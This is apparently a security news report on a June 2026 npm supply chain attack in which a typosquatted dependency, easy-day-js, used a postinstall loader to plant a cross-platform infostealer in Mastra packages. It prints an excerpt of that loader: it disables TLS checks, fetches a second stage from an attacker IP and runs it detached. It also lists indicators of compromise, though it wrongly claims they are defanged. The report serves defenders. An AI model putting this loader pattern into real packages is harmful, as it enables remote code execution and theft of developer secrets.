A large-scale software supply chain attack has compromised more than 140 npm packages under the widely used Mastra namespace, exposing developers, CI/CD pipelines, and enterprise environments to a stealthy cross-platform infostealer.
The campaign, uncovered by the Socket Research Team on June 17, 2026, leveraged a typosquatting dependency, easy-day-js, to silently deliver malicious payloads during package installation, significantly increasing the blast radius due to Mastra’s popularity in modern development workflows.
The attackers published 141 malicious package versions through a single npm account, “ehindero,” within a narrow time window. Notably, the actual @mastra/* package code remained unchanged, allowing the compromise to evade traditional source code reviews.
Instead, the threat was introduced via a dependency injection attack, where easy-day-js (a fake variant of the legitimate dayjs library) was added to package manifests.
Version 1.11.22 of easy-day-js weaponized a postinstall script, ensuring automatic execution upon npm install, even before developers interacted with the package.
Compromising 140+ Mastra Packages
The infection begins with a loader script (setup.cjs) that runs during installation. This script turns off TLS certificate validation, connects to attacker-controlled infrastructure, downloads a second-stage payload, runs it as a detached background process, and deletes itself to evade forensic detection.
process.env.NODE_TLS_REJECT_UNAUTHORIZED = '0';
const url="https://23.254.164.92:8000/update/49890878";
const stage2 = await (await fetch(url)).text();
child_process.spawn(process.execPath, [out, '23.254.164.123:443'], {
detached: true, stdio: 'ignore'
}).unref();The second-stage payload (protocal.cjs) is a persistent Node. A JS-based implant capable of executing arbitrary commands from a command-and-control (C2) server.
It establishes persistence across Windows, macOS, and Linux systems using platform-specific mechanisms such as registry Run keys, LaunchAgents, and systemd services.
Beyond persistence, the malware performs host reconnaissance. It collects sensitive data, including browser history (Chrome, Edge, Brave) and inventories of cryptocurrency wallet extensions across 160+ wallets, such as MetaMask, Phantom, and Coinbase Wallet.
While the recovered sample primarily inventories extensions, its modular design allows attackers to deploy additional payloads for credential theft and further exploitation.
Indicators of Compromise (IOCs)
| Type | Indicator |
|---|---|
| C2 IP | 23.254.164.92 |
| C2 IP | 23.254.164.123 |
| URL | https://23.254.164.92:8000/update/49890878 |
| URL | https://23.254.164.123:443/49890878 |
| File | protocal.cjs |
| File | .pkg_history / .pkg_logs |
| Persistence | NvmProtocal (Windows Run Key) |
| Persistence | com.nvm.protocal (macOS LaunchAgent) |
| Service | nvmconf.service (Linux) |
| SHA256 | b122a9873bedf145ae2a7fd024b5f309007dbb025149f4dc4ac3f7e4f32a36a4 |
| SHA256 | 221c45a790dec2a296af57969e1165a16f8f49733aeab64c0bbd768d9943badf |
Note: IP addresses and domains are intentionally defanged (e.g., [.]) to prevent accidental resolution or hyperlinking. Re-fang only within controlled threat intelligence platforms such as MISP, VirusTotal, or your SIEM.
One of the most concerning aspects of this campaign is that it executes during dependency installation, meaning even passive environments, such as CI runners or automated build systems, are at risk.
The inclusion of highly popular packages like @mastra/core (over 918K weekly downloads) amplifies the potential scale of compromise.
The malware’s ability to turn off TLS validation, use ICAP-like covert communication, and masquerade as legitimate Node/NVM components demonstrates a high level of sophistication. Additionally, reuse of tooling observed in earlier campaigns suggests an organized and evolving threat actor.
Security teams are advised to treat any system that has installed affected versions as compromised. Immediate actions include removing malicious package versions, deleting the node_modules directory, and reinstalling clean dependencies.
Persistence mechanisms must be manually eradicated, and all potentially exposed credentials, including npm tokens, cloud secrets, and SSH keys, should be rotated.
Organizations should also enforce stricter dependency controls, such as disabling install scripts (npm install –ignore-scripts), implementing package allowlisting, and monitoring outbound network connections during builds.
This incident highlights the growing risk of transitive dependency attacks. It reinforces the need for runtime behavioral analysis alongside traditional code auditing.
CISO & Security Leaders: Your next breach may not have a face. Join ISC2’s LIVE webinar, “Ghost in the Machine”
